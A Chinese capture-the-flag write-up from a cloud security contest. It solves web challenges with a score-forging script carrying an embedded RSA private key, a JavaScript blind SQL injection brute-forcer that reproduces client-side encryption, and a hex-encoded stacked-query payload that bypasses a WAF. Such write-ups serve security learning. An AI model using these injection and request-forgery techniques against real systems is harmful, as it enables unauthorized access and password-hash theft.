"数字经济"云安全共测大赛Web-Writeup

gameapp

这题首先反编译apk，简单看了看代码，主要是有startgame和score两个api，然后用模拟器(手机登不上)安装apk抓了下包，数据经过了rsa加密，所以首先用python实现rsa（在网上搜索私钥可以发现已经使用过，所以直接将别人的脚本改了改来用）。题目要求获取99999，但一次最多获取100分，所以发送999次100分，在发送一次99分即可。

 import cPickle,M2Crypto,os,urllib,requests
 BaseUrl="http://121.40.219.183:9999/"
 sign_pri='''
 -----BEGIN RSA PRIVATE KEY-----
 MIICXgIBAAKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYImonQdMC1Y8USwIwf7Y0GcBP
 /h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8aYFoms223okyzeTlUIRHbIkto
 1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEA3Hau/DTzW4g4xhvzQIDAQAB
 AoGAVHWs7rAnT28ZHtPUCNzqulXrlnBIhx3JMejJfqfR8H7vff2TqcA4FEEr2QNx
 U0Pj0tzqS9KrO1EpQ7FwXtheoAmf3tQb5BDxPxcph2820qa/AcIxHpf5LqfONs9d
 UrozcR23s561yjX7w5akeRzOwrq2BKwVtF/EoXvJTQKlwV0CQQDY96T70hxUOLoJ
 FrLelwl/4Heb0Lrz83lMB6UXknUbJgOiZr/KD9NzEM477MqzKD2rTM4TeULX6cNd
 hXm35daXAkEAyWtkRrStowoiscynG1KfaT4ksbbHWr53iqAhv7Z3SAshn3k9TURk
 kLCQhyIcXXnuEEGFlK84WxQSy2Q6uLI9OwJBAMpLdE+7IuDAF2z79gCmUJwjfUIR
 hw6H95OVGS/2RSvv8LmOFcpfoSaLB89Fw+TxYzaBoS71BAbulVJwbgGx0bcCQQCs
 rJxy4UJam73Sn5hDHDn9h4D9uax+ZvskpNNJ/6uS37gbd1zOeOud/0BoGR4oJPeq
 iAF0ziKKMlNKesq8vFExAkEAsvLbn5avP/CEkXZB4sRDV/gD3mK+IY5p+ZlBSYAe
 KhVKdUXkdJwNqBn+iJMwFhMC7xHIbijLRe3hL9ZB0vt1nQ==
 -----END RSA PRIVATE KEY-----
 '''
 def private_encrypt(data):
 rsa_pri = M2Crypto.RSA.load_key_string(sign_pri)
 ctxt_pri = rsa_pri.private_encrypt(data, M2Crypto.RSA.pkcs1_padding)
 ctxt64_pri = ctxt_pri.encode('base64')
 return ctxt64_pri
 def public_decrypt(msg):
 sign_pub='''
 -----BEGIN PUBLIC KEY-----
 MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMY
 ImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8a
 YFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHE
 A3Hau/DTzW4g4xhvzQIDAQAB
 -----END PUBLIC KEY-----
 '''
 bio = M2Crypto.BIO.MemoryBuffer(sign_pub)
 rsa_pub = M2Crypto.RSA.load_pub_key_bio(bio)
 ctxt_pri = msg.decode("base64")
 output = rsa_pub.public_decrypt(ctxt_pri, M2Crypto.RSA.pkcs1_padding)
 return output

 data1 = '{"player" : "user"}'
 a = requests.Session()
 a.post(url=BaseUrl+"startgame/",data=private_encrypt(data1),headers={'Content-Type':'xxx'})
 for i in range(999):
 r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":100,"op":"add"}"""),headers={'Content-Type':'xxx'})
 print r.text
 r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":99,"op":"add"}"""),headers={'Content-Type':'xxx'})
 print r.text

 r=a.get(url=BaseUrl,headers={'Content-Type':'xxx'})
 print r
 print a

Inject4Fun

这题需要说的其实不多，总结就两点

1.实现前端加密

 var password = "admin";
 var username = "admin";
 var a = '1234567890abcdef';
 var key = CryptoJS.enc.Latin1.parse(a);
 var iv =    CryptoJS.enc.Latin1.parse('1234567890123456');
 var data1 = username;
 var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
 var data2 = password;
 var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
 var rsa = new RSAKey();
 var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
 var exponent = "010001";
 rsa.setPublic(modulus, exponent);
 var res = rsa.encrypt(a);
 var xhr = new XMLHttpRequest();
 xhr.open("POST","http://129.204.73.141:2000/login.php",false);
 xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
 xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res);
 xhr.response
 2.绕过waf
 这里直接给出payload

 var username = "admin'=(left(right(password,1),1)>'a')='1"; //返回wrong password
 var username = "admin'=(left(right(password,1),1)<'a')='1"; //返回wrong user
 exp

不知道为什么，这题的waf有毒，可能随机性触发，可以通过修改随机生成的16位key来解决着这个问题

因为waf有毒的问题，没法一次性跑出32位hash，需要多次修改a来获取完整hash

 var pass='';
 var s='1234567890abcdef';
 for(var n=1;n<33;n++)
 {
 for(var i in s)
 {
 var password = "admin";
 var username = "admin'=(left(right(password,"+n+"),1)='"+s[i]+"')='1";
 var a = '1234567890abceef';
 var key = CryptoJS.enc.Latin1.parse(a);
 var iv =    CryptoJS.enc.Latin1.parse('1234567890123456');
 var data1 = username;
 var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
 var data2 = password;
 var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
 var rsa = new RSAKey();
 var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
 var exponent = "010001";
 rsa.setPublic(modulus, exponent);
 var res = rsa.encrypt(a);
 var xhr = new XMLHttpRequest();
 xhr.open("POST","http://129.204.73.141:2000/login.php",false);
 xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
 setTimeout(xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res),1000);
 if(xhr.response.search('wrong password')!=-1)
 {pass+=s[i];console.log(s[i]+' '+n);break;}
 }
 }

aliwaf

1. 不能用子查询，select和from不能同时出现

2. set 与 execute不能同时出现，还有一些waf，记不清了

通过--%0a测出堆叠后，最后拿一叶飘零强网杯的payload改为下面这样拿到flag

http://aliwaf.xctf.org.cn/index.php?username=0%27;--%0aselect%200x73656c65637420757365722066726f6d206d7973716c2e75736572%20into%20@s;prepare%20a%20from%20@s;EXECUTE%20a;

qcloud

这题赛中没做出来，第一天用char(1,2,3)判断了是sqlite，第二天却发现没法用sqlite_version和sqlite_master震惊。运气好猜到了user表，但是没有弄出数据来